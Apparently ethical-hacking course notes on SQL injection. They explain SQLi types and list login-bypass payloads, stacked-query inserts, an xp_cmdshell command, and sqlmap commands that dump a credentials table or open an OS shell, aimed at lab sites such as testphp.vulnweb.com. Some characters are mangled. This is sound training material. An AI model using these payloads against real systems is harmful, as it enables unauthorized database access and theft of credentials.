15 - SQL Injection
Module 15 - SQL Injection
What is SQL Injection?
SQL Injection is a type of security vulnerability that occurs when an attacker is able to manipulate an SQL query in a way that it executes unintended commands on a database. This can lead to unauthorized access, data disclosure, data manipulation, or even database destruction.
Here's a basic textual explanation:
1. SQL Query: In web applications, databases are often used to store and retrieve data. The application sends SQL queries to the database to interact with the data.
2. User Input: User input is data that a user provides to a web application, like a search query in a text box or a login form.
3. Vulnerability: In a vulnerable application, the SQL query is constructed by simply including the user's input without proper validation or sanitization.
4. Attack: An attacker can enter malicious input, which may include SQL code, into the user input fields. If the application doesn't properly validate and sanitize this input, the attacker's SQL code becomes part of the query sent to the database.
5. Exploitation: The attacker can manipulate the SQL query to perform malicious actions, such as extracting sensitive data, modifying or deleting data, or even taking control of the database.
Type of SQL Injection
Types of SQL Injection
Union-based SQLi: This technique involves using the UNION SQL operator to combine the results of the original query with the results of an attacker-controlled query.
Error-based SQLi: This technique involves forcing the database to generate an error, which can reveal information about the database structure.
Blind SQLi: In this type of SQLi, the attacker doesn't get the results of the SQL query in the HTTP response. The attacker has to send a payload, and based on the application's response, he can infer if the payload was executed successfully or not.
Time-based Blind SQLi: This is a type of blind SQLi where the attacker can infer if the payload was executed successfully or not based on the time the server takes to respond.
Out-of-Band SQLi: In this type of SQLi, the attacker doesn't get the results of the SQL query in the HTTP response. Instead, the results are sent to an external server controlled by the attacker.
Second Order SQLi: In this type of SQLi, the payload is not directly injected into the SQL query, but it is stored by the application and used in a later SQL query.
Stored Procedure Attacks: This involves calling stored procedures from the SQL injection point.
Function Call Payloads: This involves calling database functions from the SQL injection point.
Boolean-based SQLi: This involves sending a SQL query that will return a different result depending on whether the condition in the query is true or false.
Content-based SQLi: This involves sending a SQL query that will return a different result depending on the content of the HTTP response.
Manual Injection
β or 1=1 --for login bypassadmin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1β
βinsert into login values ('john','apple123'); --create own user in the databaseβcreate database mydatabase; --create database with name of mydatabaseβexec master..xp_cmdshell 'ping www.moviescope.com -l 65000 -t'; --execute ping on moviescope
SQLMap
Open the vulnerable website
Copy the cookie from the inspect element
Open the terminal and run SQLMap
Basic Commands
SQLMAP Extract DBS
sqlmap -u βhttp://www.example.com/viewprofile.aspx?id=1β--cookie="xookies xxx" --dbssqlmap -u βhttp://www.example.com/viewprofile.aspx?id=1β--cookie="xookies xxx" --data="id=1&Submit=Submit"--dbs
Extract Tables
sqlmap -u βhttp://www.example.com/viewprofile.aspx?id=1β--cookie="cookies xxx" -D moviescope --tables
Extract Columns
sqlmap -u βhttp://www.example.com/viewprofile.aspx?id=1β--cookie="cookies xxx" -D moviescope -T User_Login --columns
Dump Data
sqlmap -u βhttp://www.example.com/viewprofile.aspx?id=1β--cookie="cookies xxx" -D moviescope -T User_Login --dump
OS Shell to execute commands
sqlmap -u βhttp://www.example.com/viewprofile.aspx?id=1β--cookie="cookies xxx" --os-shell
Login bypass
blah' or 1=1 --
Insert data into DB from login
blah';insert into login values ('john','apple123');
Create database from login
blah';create database mydatabase;
Execute cmd from login
blah';exec master..xp_cmdshell 'ping www.moviescope.com -l 65000 -t'; --
Perform an SQL Injection Attack Against MSSQL to Extract Databases using SQLMap
Login a website
Inspect element
Dev tools->Console: document.cookie
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" βdbs
-u: Specify the target URL
--cookie: Specify the HTTP cookie header value
--dbs: Enumerate DBMS databases
Get a list of databases
Select a database to extract its tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope βtables
-D: Specify the DBMS database to enumerate
--tables: Enumerate DBMS database tables
Get a list of tables
Select a column
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope βT User_Login --dump
Get table data of this column
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" --os-shell
Get the OS Shell
TASKLIST
Then, if we've SQL username and psw, we can use them to login and query db.
Other Tools
Havij: Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities.
jSQL Injection: jSQL Injection is a lightweight application used to find database information from a distant server.
BBQSQL: BBQSQL is a blind SQL injection framework written in Python.
NoSQLMap: NoSQLMap is an open-source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases.
SQLNinja: SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
SQLiX: SQLiX is a SQL Injection scanner written in Perl.
SQLSentinel: SQLSentinel is an application-level firewall for MySQL that prevents SQL Injection attacks.
MyBatis: MyBatis is a Java persistence framework that includes a built-in SQL Injection scanner.
Blisqy: Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.
Lab - Example of use
SQLMap
site:http://testphp.vulnweb.com/ php?= (for finding vulnerable site)
(for cookies- console->document.cookie)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs (databases)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart βtables (tables)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns (columns)
(dump whole table)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --dump
OR
(dump individual column data)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass --dump
Additional Resources
Last updated